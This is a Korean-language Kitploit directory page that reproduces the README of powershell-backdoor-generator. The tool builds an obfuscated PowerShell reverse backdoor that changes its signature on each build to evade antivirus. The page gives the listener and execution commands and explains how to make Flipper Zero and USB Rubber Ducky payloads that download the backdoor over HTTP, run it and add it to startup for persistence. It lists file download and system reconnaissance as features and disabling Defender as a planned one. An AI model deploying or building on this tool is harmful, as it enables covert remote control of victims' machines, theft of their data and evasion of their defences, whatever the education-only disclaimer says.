Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
powershell-backdoor-generator — PowerShell로 작성되고 Python으로 난독화된 리버스 백도어입니다. Flipper Zero 및 Hak5 USB Rubber Ducky와 같은 인기 해킹 장치용 페이로드를 생성하며, AV 탐지를 피하기 위해 빌드할 때마다 서명을 변경합니다. | Kitploit
도구/GitHubGitHub/drew-alleman/powershell-backdoor-generator
Payload GenerationShellcode Generation
GitHubdrew-alleman/powershell-backdoor-generator

powershell-backdoor-generator

PowerShell로 작성되고 Python으로 난독화된 리버스 백도어입니다. Flipper Zero 및 Hak5 USB Rubber Ducky와 같은 인기 해킹 장치용 페이로드를 생성하며, AV 탐지를 피하기 위해 빌드할 때마다 서명을 변경합니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
413653년 전Kitploit 검토 완료

/******************************************************************************

  • 면책 조항:
  • 이 프로그램은 교육 목적으로만 제공됩니다. 이 프로그램을 사용함으로써,
  • 사용자는 사용과 관련된 잠재적 위험을 이해한다는 데 동의합니다.
    • 이 프로그램은 적절한 권한 없이 어떤 시스템이나 네트워크에도 사용해서는
  • 안 됩니다. 무단 사용은 엄격히 금지됩니다.
    • 이 프로그램의 제작자는 이 프로그램 사용으로 인해 발생하는 모든 손해,
  • 법적 결과 또는 데이터 손실에 대해 책임을 지지 않습니다.
    • 이 프로그램을 사용하는 동안 모든 해당 법률 및 규정을 준수하는 것은
  • 사용자의 책임입니다.
  • 이 프로그램을 책임감 있고 윤리적으로 사용하고, 다른 사람의 프라이버시와
  • 보안을 존중해 주십시오. *****************************************************************************/

powershell-backdoor

Guide
PowerShell로 작성되고 Python으로 난독화된 리버스 백도어 도구로, 빌드할 때마다 새로운 시그니처를 제공하여 탐지를 피합니다. 이 도구는 Flipper Zero 및 Hak5 USB Rubber Ducky와 같은 인기 해킹 장치용 페이로드를 생성할 수 있습니다. 이 도구를 사용하여 고급 공격 기술에 대한 시스템의 방어를 테스트하십시오.

root@kitploit:~
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
                 [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
  -h, --help            show this help message and exit
  --ip-address IP_ADDRESS, -i IP_ADDRESS
                        IP Address to bind the backdoor too (default: 192.168.X.XX)
  --port PORT, -p PORT  Port for the backdoor to connect over (default: 4444)
  --random, -r          Randomizes the outputed backdoor's file name
  --out OUT, -o OUT     Specify the backdoor filename (relative file names)
  --verbose, -v         Show verbose output
  --delay DELAY         Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
  --flipper FLIPPER     Payload file for flipper zero (includes EOL conversion) (relative file name)
  --ducky               Creates an inject.bin for the http server
  --server-port SERVER_PORT
                        Port to run the HTTP server on (--server) (default: 8080)
  --payload PAYLOAD     USB Rubber Ducky/Flipper Zero backdoor payload to execute
  --list--payloads      List all available payloads
  -k KEYBOARD, --keyboard KEYBOARD
                        Keyboard layout for Bad Usb/Flipper Zero (default: us)
  -A, --actually-listen
                        Just listen for any backdoor connections
  -H, --listen-and-host
                        Just listen for any backdoor connections and host the backdoor directory

빠른 링크

  • 미리보기
  • 기능
  • 표준 백도어
  • Flipper Zero 백도어
  • USB Rubber Ducky 백도어
  • 감사의 말
  • 할 일
  • 5회 난독화 출력

미리보기

preview

기능

  • Hak5 Rubber Ducky 페이로드
  • Flipper Zero 페이로드
  • 원격 시스템에서 파일 다운로드
  • URL에서 wav 파일 재생
  • 대상 컴퓨터의 공인 IP 주소 가져오기
  • 로컬 사용자 목록 표시
  • 흥미로운 파일 찾기
  • 대상 시스템의 운영 체제 정보 수집
  • 대상 시스템의 BIOS 정보 검색
  • 안티바이러스 소프트웨어 설치 여부 및 현재 상태 확인
  • 활성 TCP 클라이언트 가져오기
  • Windows용 인기 패키지 관리자 Chocolatey 설치 (https://chocolatey.org/)
  • 대상 시스템에 일반적인 침투 테스트 소프트웨어 설치 여부 확인

표준 백도어

root@kitploit:~
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

현재 작업 디렉토리에 backdoor.ps1이라는 파일이 생성됩니다.

백도어 실행

Windows 11, Windows 10 및 Kali Linux에서 테스트되었습니다. 숨겨진 창으로 실행하고 지속성 액세스를 위해 다음 가이드를 따르십시오 here

root@kitploit:~
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
root@kitploit:~
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

Bad USB/ USB Rubber Ducky 공격

이러한 공격 중 하나를 사용하면 백도어를 호스팅하는 HTTP 서버가 열립니다. 백도어가 검색되면 HTTP 서버가 종료됩니다.

페이로드

  • Execute -- 백도어 실행
  • BindAndExecute -- 사용자 임시 디렉토리에 백도어를 배치하고, 시작 프로그램에 등록한 후 실행합니다. (관리자 권한 필요)

Flipper Zero 백도어

아래는 powershell_backdoor.txt라는 파일을 생성하며, Flipper에서 실행하면 HTTP를 통해 컴퓨터에서 백도어를 가져와 실행합니다.

root@kitploit:~
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

지정한 텍스트 파일(예: powershell_backdoor.txt)을 Flipper Zero에 넣으십시오. 페이로드가 실행되면 backdoor.ps1을 다운로드하여 실행합니다.

USB Rubber Ducky 백도어

아래는 Hak5 USB Rubber Ducky용 inject.bin 파일을 생성하는 방법에 대한 튜토리얼입니다.

root@kitploit:~
 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

inject.bin이라는 파일이 현재 작업 디렉토리에 생성됩니다. 이 기능을 사용하려면 Java가 필요합니다. 페이로드가 실행되면 backdoor.ps1을 다운로드하여 실행합니다.

감사의 말

USB Rubber Ducky 공격을 위해 payload.txt를 inject.bin으로 인코딩하기 위해 midnitesnake가 만든 encoder.jar를 사용합니다.

할 일

  • 최근 RDP 연결 가져오기
  • URL에서 배경화면 변경
  • 쓰기 가능한 디렉토리 찾기
  • 로그 지우기
  • Defender 비활성화

5회 난독화 출력

다음은 5번 빌드 후 backdoor.ps1의 sha1 해시입니다.

root@kitploit:~
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49
도구 다운로드